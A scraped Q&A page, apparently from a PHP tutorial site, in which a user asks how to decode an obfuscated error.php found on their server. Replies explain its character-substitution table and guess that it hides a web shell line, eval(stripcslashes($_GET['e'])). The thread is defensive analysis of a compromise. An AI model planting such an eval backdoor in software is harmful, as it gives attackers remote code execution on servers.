>백엔드 개발 >PHP 튜토리얼 >php安全 - 如何解析这个base64加密的PHP文件内容?

php安全 - 如何解析这个base64加密的PHP文件内容?

WBOY
WBOY원래의
2016-06-06 20:15:391428검색

突然服务器监控到非常慢的执行文件
然后找到了一个名字叫 error.php 的文件,我虽然删除了,但是还很不放心,可以帮我看看里面是什么内容吗?或者有什么方法可以看到吗?类似 base64_decode 之类的加密?

http://runjs.cn/detail/t7pjk2ps
点击查看源码帮我查看下 拜托各位。

回复内容:

突然服务器监控到非常慢的执行文件
然后找到了一个名字叫 error.php 的文件,我虽然删除了,但是还很不放心,可以帮我看看里面是什么内容吗?或者有什么方法可以看到吗?类似 base64_decode 之类的加密?

http://runjs.cn/detail/t7pjk2ps
点击查看源码帮我查看下 拜托各位。

简单的替换字符串,密码表就是上面的'f', '0'=>'w', '3'=>'7', '2'=>'n', '5'=>'g', '4'=>'D', '7'=>'A', '6'=>'5', '9'=>'J', '8'=>'T', 'A'=>'t', 'C'=>'N', 'B'=>'H', 'E'=>'2', 'D'=>'O', 'G'=>'z', 'F'=>'9', 'I'=>'s', 'H'=>'a', 'K'=>'i', 'J'=>'p', 'M'=>'G', 'L'=>'0', 'O'=>'P', 'N'=>'e', 'Q'=>'v', 'P'=>'Q', 'S'=>'4', 'R'=>'K', 'U'=>'U', 'T'=>'L', 'W'=>'h', 'V'=>'S', 'Y'=>'y', 'X'=>'C', 'Z'=>'V', 'a'=>'b', 'c'=>'x', 'b'=>'R', 'e'=>'l', 'd'=>'r', 'g'=>'j', 'f'=>'o', 'i'=>'Y', 'h'=>'M', 'k'=>'8', 'j'=>'E', 'm'=>'I', 'l'=>'c', 'o'=>'3', 'n'=>'u', 'q'=>'Z', 'p'=>'F', 's'=>'q', 'r'=>'W', 'u'=>'B', 't'=>'m', 'w'=>'X', 'v'=>'k', 'y'=>'1', 'x'=>'6', 'z'=>'d'

执行函数 eval/wkptvfa/(nkvtfik($wlxyoibj, $genueofqx))

/如果没有猜错,应该是访问某个网址。/

如果很耗cpu,解密后应该类似这个函数
eval(stripcslashes($_GET['e']));

转码的话就是base64_decode()

성명:
본 글의 내용은 네티즌들의 자발적인 기여로 작성되었으며, 저작권은 원저작자에게 있습니다. 본 사이트는 이에 상응하는 법적 책임을 지지 않습니다. 표절이나 침해가 의심되는 콘텐츠를 발견한 경우 admin@php.cn으로 문의하세요.